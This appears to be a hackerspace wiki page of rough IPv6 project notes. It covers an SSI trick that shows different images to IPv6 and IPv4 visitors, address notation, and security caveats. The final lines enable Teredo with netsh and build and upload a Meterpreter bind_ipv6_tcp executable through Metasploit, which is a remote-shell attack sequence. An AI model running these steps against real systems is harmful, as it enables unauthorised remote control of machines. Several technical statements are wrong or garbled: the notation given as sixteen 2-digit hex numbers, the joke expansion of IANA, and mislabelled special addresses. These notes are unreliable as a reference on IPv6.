| IPv6 |
|
| founder: | ruza |
| depends on: | |
| interested: | kxt, biiter |
| software license: | |
| hardware license: | |
| status: | active |
The project is currently in the planning stage.
Check your web server support SSI
- /etc/apache2/sites-enabled/000-default
SetEnvIf Server_Addr "^2001:" IPV6
wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png
wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
- index.html
<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" />
<!--#else --> <img src="/images/ipv4.png" alt="IPv4 sad" />
<!--#endif -->
The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', global addresses are allocated by
IANA (Ip Address Not Available)
”::” stands for a string of 0 bits.
Special addresses are ::1 for loopback
::FFFF:<IPv4 address> for IPv4-mapped-on-IPv6
fe00::0/8 ip6-localnet
ff00::0 ip6-mcastprefix
fe80::/10 individuální lokální linkové
Finding IPv6 hosts
http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1
unlimited size of header chain DoS aka Routing header DoS vs
RFC 5095
IPsec not required by IPv6
blinds IPS, firewalls, ACLs
network security relies more on endpoint security!
DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology)
more relied upon
moar types
stateles (SLAAC)
statefull DHCPv6,
RFC 3315
ipv6 default policy allowed, not inspected
imany icmp6 types needs to be allowed too
how to build and maintain antispam reputation databases?
fragmentation and reassembly is done only by the end system
running teredo/miredo you are using public IP address

-
int ipv6 install
netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip)
netsh int ipv6 show teredo # we need qualified State
msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe
upload bind.exe
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
http://vimeo.com/15243189